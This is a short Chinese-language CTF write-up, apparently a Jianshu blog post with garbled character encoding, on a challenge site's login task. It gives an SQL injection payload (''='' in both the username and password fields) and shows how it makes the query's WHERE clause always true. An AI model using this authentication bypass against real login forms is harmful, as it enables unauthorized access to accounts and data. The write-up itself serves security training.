實(shí)驗(yàn)吧CTF 登陸一下好嗎??解題WriteUp

這個(gè)CTF?題目的payload真的簡(jiǎn)單到淫蕩,看一下就是這樣的

admin->?‘=’

password->?‘=’

真是醉了,為什么呢,類(lèi)似這樣的語(yǔ)句

$sql?=?“select?user?from?flag?where?user=’\$_POST[‘user’]’?and?password=’\$_POST[‘password’]’”;

如果我們按照上面輸入就成了

$sql?=?“select?user?from?flag?where?user=’‘=’’?and?password=’‘=’‘”;

user=”返回的是NULL=”也是符合條件的,最后就是

$sql?=?“select?user?from?flag?where?1?and?1”;

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時(shí)請(qǐng)結(jié)合常識(shí)與多方信息審慎甄別。
平臺(tái)聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡(jiǎn)書(shū)系信息發(fā)布平臺(tái),僅提供信息存儲(chǔ)服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

  • SQL注入是CTF的WEB方向必不可少的一種題型,斗哥最近也做了一些在線題目,其中最常見(jiàn)的題目就是給出一個(gè)登錄界面...
    漏斗社區(qū)閱讀 24,464評(píng)論 0 7
  • Spring Cloud為開(kāi)發(fā)人員提供了快速構(gòu)建分布式系統(tǒng)中一些常見(jiàn)模式的工具(例如配置管理,服務(wù)發(fā)現(xiàn),斷路器,智...
    卡卡羅2017閱讀 136,533評(píng)論 19 139
  • 1. Java基礎(chǔ)部分 基礎(chǔ)部分的順序:基本語(yǔ)法,類(lèi)相關(guān)的語(yǔ)法,內(nèi)部類(lèi)的語(yǔ)法,繼承相關(guān)的語(yǔ)法,異常的語(yǔ)法,線程的語(yǔ)...
    子非魚(yú)_t_閱讀 34,637評(píng)論 18 399
  • Spark SQL, DataFrames and Datasets Guide Overview SQL Dat...
    Joyyx閱讀 8,479評(píng)論 0 16
  • 作為陜西小吃的“總代表”,我要來(lái)夸一夸這個(gè)羊肉泡。工藝復(fù)雜,烹制精細(xì),肉爛湯濃,營(yíng)養(yǎng)豐富,暖胃耐饑。饃的嚼勁,秘制...
    大鄧閱讀 2,491評(píng)論 60 59

友情鏈接更多精彩內(nèi)容